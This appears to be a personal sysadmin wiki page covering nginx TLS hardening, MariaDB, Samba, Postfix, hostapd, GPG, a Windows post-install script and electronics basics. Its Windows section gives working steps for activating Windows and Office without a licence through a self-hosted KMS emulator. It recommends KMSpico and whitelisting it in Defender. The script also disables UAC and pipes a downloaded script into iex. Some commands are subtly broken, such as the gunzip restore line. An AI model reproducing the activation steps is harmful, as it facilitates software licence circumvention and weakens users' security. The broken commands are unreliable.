https://www.ssllabs.com/ssltest/analyze.html?d=rys.pw

https://securityheaders.io/?q=https%3A%2F%2Frys.pw%2F

https://observatory.mozilla.org/analyze.html?host=rys.pw

TLS 1.0 being deprecated 30th June 20181

All versions of nginx as of 1.4.4 rely on OpenSSL for input parameters to Diffie-Hellman (DH). Unfortunately, this means that Ephemeral Diffie-Hellman (DHE) will use OpenSSL's defaults, which include a 1024-bit key for the key-exchange.

cd /etc/ssl/certs && sudo openssl dhparam -out dhparam.pem 4096 - This takes time depending on your single core performance as it's not multithreated.(few mins on i7-4790K, 42~ mins on Raspberry Pi 3B) You can use 2048 but it's weaker, create the stronger file at a later date if you just want to get it running for now.

sudo nano /etc/nginx/nginx.conf - place these outside of the server blocks so it applies to all servers.

Hardening

ssl_dhparam /etc/ssl/certs/dhparam.pem;
ssl_protocols TLSv1.2 TLSv1.3; # Keep in mind this will break software that is way past it's end of life.
ssl_prefer_server_ciphers on;
ssl_ciphers "EECDH+AESGCM:EDH+AESGCM:AES256+EECDH:AES256+EDH";
ssl_ecdh_curve secp384r1; # Requires nginx >= 1.1.0
ssl_session_cache shared:SSL:10m;
ssl_session_tickets off; # Requires nginx >= 1.5.9
ssl_stapling on; # Requires nginx >= 1.3.7
ssl_stapling_verify on; # Requires nginx => 1.3.7
#resolver $DNS-IP-1 $DNS-IP-2 valid=300s; # I do not understand those so I disabled them
#resolver_timeout 5s;
#RESOLVERS: if you don't specify any, nginx will resolve HTTP upstream server hostnames when starting up, and will never attempt to re-resolve them. This is a problem if later the IP addresses of these upstream servers change. But if you define resolvers in nginx.conf, it will honor the TTL of DNS records, and re-resolve the hostnames periodically.
#Make sure you correctly respond to this or the issue is fixed before defining the resolver. http://blog.zorinaq.com/nginx-resolver-vulns/
add_header Strict-Transport-Security "max-age=63072000; includeSubdomains; preload"; # You can add your domain to Chromium's source code for automatic preloading https://hstspreload.org/?domain=rys.pw
add_header X-Frame-Options DENY;
add_header X-Content-Type-Options nosniff;
add_header X-XSS-Protection "1; mode=block";
#add_header Content-Security-Policy "default-src 'self';"; # if you require no scripting.. likely not the case.
add_header Content-Security-Policy "default-src 'self'; script-src 'self'; img-src 'self' data:; style-src 'self' 'unsafe-inline'; font-src 'self' data:; child-src 'self'; connect-src 'self' https://apis.google.com; object-src 'none' ";
# READ THIS - http://lollyrock.com/articles/content-security-policy/

SSL certs - you'll need to use letsencrypt to get these

ssl_certificate /etc/letsencrypt/live/rys.pw/fullchain.pem;
ssl_certificate_key /etc/letsencrypt/live/rys.pw/privkey.pem;

Add a block that redirects all HTTP requests to HTTPS

server {
listen 80;
listen [::]:80;
server_name rys.pw;
return 301 https://$host$request_uri;
}

Additionally use listen 443 ssl http2; listen [::]:443 ssl http2; in every other server block to force TLS and support HTTP2 protocol.

MariaDB

Packages: mariadb

sudo mysql_install_db --user=mysql --basedir=/usr --datadir=/var/lib/mysql

sudo nano /etc/php/php.ini - uncomment extension=mysqli.so

sudo systemctl restart php-fpm

sudo systemctl enable --now mysqld

**sudo /usr/bin/mysql_secure_installation **

Backup:

mysqldump --single-transaction --flush-logs --master-data=2 --all-databases -u root -p | gzip > all_databases.sql.gz

Restore:

gunzip all_databases.sql.gz | mysql -u root -p

mysqldump --defaults-file=/path-to-file/SQLcreds.txt --all-databases > my_db.sql

nano SQLcreds.txt

[mysqldump]
user=mysqluser
password=secret

sudo chown root:root SQLcreds.txt

sudo chmod 700 SQLcreds.txt

PhpMyAdmin

Packages: phpmyadmin php-mcrypt

sudo nano /etc/nginx/nginx.conf - add a whole new server block for phpmyadmin

server {
    listen 443 ssl http2;
    listen [::]:443 ssl http2;
    server_name phpmyadmin.localhost;
    root /usr/share/webapps/phpMyAdmin;
    index index.php;
    location ~ \.php$ {
        try_files $uri =404;
        fastcgi_pass unix:/run/php-fpm/php-fpm.sock;
        fastcgi_index index.php;
        include fastcgi.conf;
    }
}

Murmur

Packages: murmur

Port: TCP/UDP 64738

Config: /etc/murmur.ini

Setting valid TLS(SSL) certificate:

uncomment and set these two lines in the config

sslCert=/etc/letsencrypt/live/rys.pw/fullchain.pem
sslKey=/etc/letsencrypt/live/rys.pw/privkey.pem

Let's Encrypt

Packages: certbot certbot-apache/certbot-nginx

https://letsencrypt.org/getting-started/

sudo systemctl stop nginx - Stop your webserver. In case of apache you want to stop httpd

sudo certbot certonly --standalone -d rys.pw -d www.rys.pw -d phpmyadmin.rys.pw -d tickets.rys.pw -d pihole.rys.pw -d mumble.rys.pw -d esp8266.rys.pw -d cloud.rys.pw -d paste.rys.pw --email email@example.com --rsa-key-size 4096 --agree-tos

sudo systemctl start nginx

To non-interactively renew all of your certificates, run **certbot renew --rsa-key-size 4096 **.

Postfix

?Final setup - TODO - postfix+dovecot+roundcube+postfixadmin?

Order of importance of records:

SPF > DKIM > DMARC

https://wiki.archlinux.org/index.php/postfix

Packages: postfix #dovecot roundcubemail postfixadmin php-imap

First set up DNS records. I will be using rys.pw, so I set MX record of @ pointed to rys.pw, which is in turn pointed at my VPS.

systemctl enable --now postfix

This will likely land in your spam folder. echo "Message" | mailx -s "important mail" yourmail@gmail.com

Edit /etc/postfix/main.cf

myhostname = rys.pw

postfix reload

Now you should be able to resend the test email and see it came from your domain.

Edit /etc/postfix/aliases

root: c0rn3j

change to your user account, reading email as root is bad

postalias /etc/postfix/aliases

For later changes run newaliases

Now you should be able to read mail coming from the internet(only for users that exist on the system) and the services on the box.

less /var/mail/c0rn3j

Access point (WIP)

Packages: hostapd dnsmasq

https://w1.fi/cgit/hostap/plain/hostapd/hostapd.conf

https://wiki.gentoo.org/wiki/Hostapd

https://frillip.com/using-your-raspberry-pi-3-as-a-wifi-access-point-with-hostapd/

sudo nano /etc/hostapd/hostapd.conf

ssid=myWifi # SSID of the network
wpa_passphrase=MySuperSecurewifi123 # password for the network
interface=wlan0 # Interface it'll run on
auth_algs=1 # 1=wpa, 2=wep, 3=both
channel=6 # Channel it'll broadcast on
driver=nl80211
hw_mode=g # 2.4GHz, 'a' for 5GHz
rsn_pairwise=CCMP
wpa=2 # WPA2 only
wpa_key_mgmt=WPA-PSK
#In addition to these, RPi3 seems to require those
ieee80211n=1 # nothing would work without this
#wmm_enabled=1 # QoS support
#ht_capab=[HT40][SHORT-GI-20][DSSS_CCK-40] #I did not actually need this

sudo nano /etc/sysctl.conf # is this an outdated way to set ipv4 forward on a systemd distro?

net.ipv4.ip_forward = 1

sudo sysctl -p

sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

sudo iptables -A FORWARD -i eth0 -o wlan0 -m state --state RELATED,ESTABLISHED -j ACCEPT

sudo iptables -A FORWARD -i wlan0 -o eth0 -j ACCEPT

sudo sh -c "iptables-save > /etc/iptables.rules"

sudo iptables-restore /etc/iptables.rules # This needs to be executed after boot

sudo nano /ect/dnsmasq

port = 0

sudo ip addr add 192.168.2.1/24 broadcast 192.168.2.255 dev wlan0

sudo ip route add default via 192.168.0.1

Samba(file sharing)

https://wiki.archlinux.org/index.php/samba

Packages: samba

sudo cp /etc/samba/smb.conf.default /etc/samba/smb.conf - copy the default config file to the default config path

sudo systemctl enable --now smb

sudo nano /etc/samba/smb.conf

workgroup = WORKGROUP #change to WORKGROUP so it's the same as default windows WG.

valid users = %S # - add this to [homes] to allow users login to their home directories(?)

Example block

[dolphin]
comment = dolphin ISOs
path = /mnt/3tbRED/DOLPHIN ISOs   # SAMBA DOESN'T NEED ESCAPE SEQUENCES FOR SPACES AND SUCH
read only = yes
valid users = c0rn3j
 Samba requires a Linux user account - you may use an existing user account or create a new one.
 Although the user name is shared with Linux system, Samba uses a password separate from that of the Linux user accounts.

sudo smbpasswd -a c0rn3j - change samba password of the user

testparm -s - will show you the current config

sudo smbstatus - list connections to the shares on the server

sudo systemctl restart smb - restart samba service to apply new config

Now on the client side...

smbclient -L //192.168.1.10 -U% - list public shares on a server

sudo mount //192.168.1.10/homes /mnt/dolphin/ -o user=c0rn3j - example: Mount the home of user c0rn3j to /mnt/dolphin/

Mounting every time is tedious though, let's add an entry to fstab to mount it on boot. First we'll need to store the credentials safely though.

sudo nano /mnt/credentials

username=c0rn3j
password=supersafepassword

sudo chmod 600 /mnt/credentials - secure it so it's not readable by anyone but root or owner.

sudo nano /etc/fstab - and add this line at the bottom

//192.168.1.10/dolphin /mnt/dolphin cifs auto,x-systemd.automount,_netdev,credentials=/mnt/credentials 0 0

mount -v - list all mountpoints

mount -t cifs - list mountpoints by fs

GPG Encryption

-c specifies to encrypt symmetrically(symmetrical is harder to crack than asymmetrical), defaults to AES-128 which should be secure enough for now and the near future. AES-256 seems to be noted as 30-40% slower, so if you don't mind taking that performance hit feel free to use that instead(but I do suggest reading why you'd want to do that first as AES-128 is possibly enough for you).

Encryption with a password and AES-256:

gpg --batch --cipher-algo AES256 --passphrase password -c file

Decryption with a password:

gpg --batch --passphrase password -o file -d file.gpg

If you are not going to be using an automatic script for encryption/decryption, you can simply omit --passphrase password and you will be asked to enter it manually.

The above example is not secure because any user can execute ps aux and see the whole command, including the password.

Now let's do it better!

nano password.txt - write your super secret password there

sudo chown root:root password.txt

sudo chmod 700 password.txt

Encryption with a password in a restricted file:

sudo gpg --batch --passphrase-file password.txt -c file

Decryption with a password in a restricted file:

sudo gpg --batch --passphrase-file password.txt -o file -d file.gpg

LUKS

Check if your password is correct and list slots:

cryptsetup luksOpen --test-passphrase --verbose /dev/sda

Add a key file for automatic unlocking via /etc/crypttab:

cryptsetup luksAddKey /dev/nvme1n1p1 /etc/adatapass

Ansible

Encrypt a file:

ansible-vault encrypt --vault-id C0rn3j/configs@~/C0rn3j_configs-vaultpass.txt id_ed25519

Encrypt a string for use in playbooks/templates:

ansible-vault encrypt_string --vault-id C0rn3j/configs@~/C0rn3j_configs-vaultpass.txt 'supersecretpassword' --name 'bree_matomo_db_password'

webOS

Since there's 2 LG TVs in the household, I figured I might as well make a separate page for them.

  1. 55UH605V-ZC - 3.10.19-p.45.dharug.k2lp.2 - FW 05.30.60 - webOS 3.3.4
  2. 55UK6200PLA - 4.4.84-p.84.gomolsha.lm18a.1 - FW 05.20.15 - webOS 4.2.0

There's some ways to jailbreak some LG TVs - XDA, RU forum

You can get SSH access by following instructions here.

cat /var/run/nyx/device_info.json - has mac addresses and TV model name among other things

cat /var/run/nyx/os_info.json - webOS version. The version the TV displays is FW version, not webOS version!

Code this as Base64 file called 'query" and execute the curl command to test connection to the update server

<REQUEST>
<PRODUCT_NM>webOSTV 4.0</PRODUCT_NM>
<MODEL_NM>HE_DTV_W18A_AFADABAA</MODEL_NM>
<SW_TYPE>FIRMWARE</SW_TYPE>
<MAJOR_VER>04</MAJOR_VER>
<MINOR_VER>10.45</MINOR_VER>
<COUNTRY>GB</COUNTRY>
<COUNTRY_GROUP>EU</COUNTRY_GROUP>
<DEVICE_ID>20:17:42:14:b7:43</DEVICE_ID>
<AUTH_FLAG>N</AUTH_FLAG>
<IGNORE_DISABLE>N</IGNORE_DISABLE>
<ECO_INFO>01</ECO_INFO>
<CONFIG_KEY>00</CONFIG_KEY>
<LANGUAGE_CODE>en-GB</LANGUAGE_CODE></REQUEST>
curl -X POST -A "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" -d @query http://snu.lge.com/CheckSWAutoUpdate.laf

If query is wrong, server cuts connection - curl: (56) Recv failure: Connection reset by peer

Server also times out very often.

Queries and responses are Base64 encoded.

Windows

Powershell setup scripts

Post-install script

# W10 21H1
# Take Cortana off the taskbar
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowCortanaButton /t REG_DWORD /d 0 /f
# Hide People button
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\People /v PeopleBand /t REG_DWORD /d 0 /f
# Delete Windows Defender tray from startup
reg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v SecurityHealth /f
# Disable Skype from startup
reg add "HKCU\SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.SkypeApp_kzf8qxf38zg5c\SkypeStartup" /v State /t REG_DWORD /d 0 /f
# Do not hide tray items when they get cluttered
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer /v EnableAutoTray /t REG_DWORD /d 0 /f

# W11 21H2
# Disable Teams+Edge from autostartup
# TODO
# Disable Widgets icon from Taskbar
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v TaskbarDa /t REG_DWORD /d 0 /f
# Disable Chat icon from Taskbar
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v TaskbarMn /t REG_DWORD /d 0 /f
# Align Taskbar to the left
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v TaskbarAl /t REG_DWORD /d 0 /f

# W11 21H2 + W10 21H1
# Enable Hyper-V on Pro or Edu
Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Hyper-V -All -NoReboot
# Disable Automatic Install of Suggested Apps 
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\ContentDeliveryManager /v SilentInstalledAppsEnabled /t REG_DWORD /d 0 /f
# Disable App Suggestions in Start menu
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\ContentDeliveryManager /v SystemPaneSuggestionsEnabled /t REG_DWORD /d 0 /f
# Disable popup "tips" about Windows
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\ContentDeliveryManager /v SoftLandingEnabled /t REG_DWORD /d 0 /f
# Disable Windows Welcome Experience
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\ContentDeliveryManager /v SubscribedContent-310093Enabled /t REG_DWORD /d 0 /f
# Disable xbox game DVR capture
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\GameDVR /v AppCaptureEnabled /t REG_DWORD /d 0 /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\GameDVR /v HistoricalCaptureEnabled /t REG_DWORD /d 0 /f
# Show file extensions
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v HideFileExt /t REG_DWORD /d 0 /f
# Opening explorer opens in THIS PC rather than RECENT FILES
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v LaunchTo /t REG_DWORD /d 1 /f
# Take Search off the taskbar
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Search /v SearchboxTaskbarMode /t REG_DWORD /d 0 /f
# Hide Task View button
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowTaskViewButton /t REG_DWORD /d 0 /f
# Show hidden files
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v Hidden /t REG_DWORD /d 1 /f
# Show hidden system files
#reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowSuperHidden /t REG_DWORD /d 1 /f
# Disable lock screen window when using password, saving one extra click
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Personalization /v NoLockScreen /t REG_DWORD /d 1 /f
# Enable Dark Mode for apps
reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Themes\Personalize /v AppsUseLightTheme /t REG_DWORD /d 0 /f
# Enable Dark Mode for system
reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Themes\Personalize /v SystemUsesLightTheme /t REG_DWORD /d 0 /f
# Disable UAC prompts
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
# Delete OneDrive from startup
reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v OneDrive /f
# Delete all taskbar shorcuts to get rid of Edge, Store and more
reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Taskband /v Favorites /f
# Disable hibernation to get rid of hiberfile.sys
#powercfg.exe -h off
# Kill and restart explorer.exe to apply most changes right now
taskkill /f /im explorer.exe
explorer.exe
# https://chocolatey.org/install
Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://chocolatey.org/install.ps1'))

# Reopen powershell

# Minimal install
choco install -y googlechrome notepadplusplus 7zip windirstat everything smplayer libreoffice-fresh nomacs ventoy
# Bloat
#choco install -y mumble googlechrome notepadplusplus 7zip crystaldiskmark crystaldiskinfo keepassxc sharex openssh telegram windirstat openjdk8 everything teamviewer smplayer libreoffice-fresh nomacs hwinfo qbittorrent ventoy

Activate Windows

First install vlmcsd and OpenVPN's tap driver for a 10.10.10.10 tunnel, as Windows will refuse to authenticate against a KMS server running on localhost

choco install -y tapwindows
# https://github.com/Wind4/vlmcsd/releases/latest
# Download the vlmcsd binaries archive and extract binaries/binaries/Windows/intel/vlmcsd-Windows-x64.exe to C:\install\vlmcsd.exe
New-Item -ItemType Directory -Force -Path C:\install
Invoke-WebRequest -Uri https://cloud.rys.pw/s/H3WeZ37ntKxGZ2s/download -OutFile C:\install\vlmcsd.exe
# Install the service
C:\install\vlmcsd.exe -s -U /n -O .
netsh advfirewall firewall add rule name="vlmcsd" dir=in action=allow program=C:\install\vlmcsd.exe enable=yes
# Start the service (it's enabled, reboot would also start it)
net start vlmcsd
# https://docs.microsoft.com/en-us/windows-server/get-started/kmsclientkeys
# https://docs.microsoft.com/en-us/windows/deployment/upgrade/windows-10-edition-upgrades#upgrade-using-a-command-line-tool
# If you do not have Home(Core) installed, you can switch between different editions (not Home)
# You can get a popup with available editions via 'slmgr /dlv all'. 
# Get just the editions by copypasting the box and running 'grep Name boxtext.txt | sort | uniq'
# Note: Windows 11 KMS keys seem to match W10 ones

# Switch edition to Edu
Cscript.exe c:\windows\system32\slmgr.vbs /ipk NW6C2-QMPVW-D7KKK-3GKT6-VCFB2

# W11 Edu 
slmgr /ipk NW6C2-QMPVW-D7KKK-3GKT6-VCFB2
# Set KMS server to a LAN one
#slmgr /skms 192.168.1.40:1688
slmgr /skms 10.10.10.10:1688
# Force activation now
slmgr /ato
# You should get a box in a few seconds that the activation passed. You can see the license info with
slmgr /dli

Activate Office

# https://docs.microsoft.com/en-us/deployoffice/vlactivation/gvlks
cd 'C:\Program Files\Microsoft Office\Office16'
# Office 2019 Pro Plus
#cscript ospp.vbs /inpkey:NMMKJ-6RK4F-KMJVX-8D9MJ-6MWKP
# Office 2021 Pro Plus
cscript ospp.vbs /inpkey:FXYTK-NJJ8C-GB6DW-3DYQT-6F7TH
cscript ospp.vbs /sethst:10.10.10.10
cscript ospp.vbs /act

Download

You can download .ISO of Windows 10 or Windows 11 versions directly from Microsoft's servers. Note that you'll have to spoof the user agent if you're on Windows, as you'll get redirected to the Media creator tool otherwise.

The ISOs provided by MS contain all the editions (sans enterprise pretty much), but you might have to add.../sources/ei.cfg file to show them all.

You can download older versions of windows and different versions of W10 through this method

If you want Enterprise, one way to get it is to install Pro/Edu and then switch the license, as per the powershell example above.

Reboot into UEFI

Open admin cmd.exe and run: shutdown /r /fw /t 0

Windows 11 Installation

[[Creating a bootable flashdrive|Boot from the flash drive]]. Remember to always select "Custom" where applicable. You can skip creating a Microsoft account by trying to login with a nonexistent email.

Windows usually gets all the drivers itself, but if something doesn't work as it should you might need to visit your motherboard or device manufacturer's website and download drivers/update firmware.

Windows usually downloads an outdated GPU driver so head over to AMD's or Nvidia's website depending on what GPU you have.

If you already have or had a Windows license, then your hardware ID combination(should be motherboard+CPU) is stored on Microsoft's servers and your license will be obtained automatically when you connect to the internet, provided you installed the same Windows version.

If you don't have a W11 license you can either:

  1. Buy a license key from official source. Buying from unofficial sources/grey markets is exactly as illegal as cracking it. You'd be literally giving your money away to thieves. The keys are from hacked MSDN accounts, credit card frauds etc.

  2. If you're in college or some sort of academic institute, they might have MSDN licenses, see if you can find a copy from their IT department.

  3. Not activate Windows - you will not be able to use Personalization features and it'll nag you

  4. Activate Windows with KMSpico. Defender will complain about it, allow it manually in Defender after installing it. Alternatively you can use vlmcsd if you want an open source, more hardcore solution.

eGovernment

Since I was forced to make an eIdentity with my government, mostly due to new laws about customs, I noted down everything needed from the view of someone who had absolutely no eGovernment account before.

Login:

Why:

Electronics

Current is a gateway drug to magic smoke.

A list of basic stuff to buy when starting out

Soldering

You might've noticed that some things are super easy to solder, some are super hard.

That's because you may be using a ruined tip(it's supposed to be shiny, not black), low-power iron or solder without lead(Pb). The last possible annoying cause is that the contacts you are soldering on are lead-free. For those I've had to use minimum 370°C and half of the connections I made were garbage.

How to not ruin a tip

Do not leave the iron on when you are not using it.

Clean the tip by applying solder, wiping it clean on a sponge or steel wool and then coat it with a thin layer of solder to prevent oxidation before you turn it off and leave it, or coat it right after turning it off.

If you use a sponge, make sure it's damp but not soaked.

Components

Wires

http://www.powerstream.com/Wire_Size.htm

LED strips

LED strips from "best" to "worst". Price is according to that.

SK9822 =~ APA102 > APA102C > WS2812B

Capacitors

If you overvolt a capacitor it will fail in moments, if you go above 50-70% of the voltage limit it will fail in months, or years. All electrolytic caps will fail eventually though, even if idle

Resistors

https://learn.sparkfun.com/tutorials/resistors

Batteries

Alkaline typically doesn't have a mAh rating because it's so current dependant

AA, AAA

To measure voltage just put multimeter to voltage mode and connect leads to positive and negative of the batteries. If the battery is non-rechargeable and way below it's supposed voltage (think <1V for 1.5V battery) it's pretty much dead.

Laws and equations

Ohm's law

The law stating that the direct current flowing in a conductor is directly proportional to the potential difference between its ends. It is usually formulated as V = IR, where V is the potential difference, or voltage, I is the current, and R is the resistance of the conductor.

To explain that in a more useful way - You can calculate for a third variable if you know the other two.

That means if you wanted to know what resistor to use if you had an LED that drops 3.3V, works at 20mA and your power source was 5V - Since the current is the same across the circuit, you'd calculate the voltage drop of the resistor divided by the current, which is 1.7V in this circuit as 3.3V is already being dropped by the LED - (5-3.3)/0.02 and would end up knowing you need to use a resistor that is 85Ω or close to that value.

Projects

Keep in mind these projects assume you have the parts kit linked at the top of the page.

ESP8266